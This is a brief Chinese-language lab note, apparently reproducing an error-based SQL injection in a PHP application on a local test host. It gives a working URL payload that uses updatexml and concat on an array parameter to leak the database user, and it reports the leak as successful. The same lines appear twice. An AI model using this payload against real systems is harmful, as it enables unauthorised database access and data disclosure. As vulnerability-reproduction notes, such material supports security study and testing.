访问看到用户名被显示了
http://192.168.49.2/index.php?ids[]=1&ids[]=2
访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出
暴露出了敏感信息
2022-11-14 22:35:31
访问看到用户名被显示了
http://192.168.49.2/index.php?ids[]=1&ids[]=2
访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出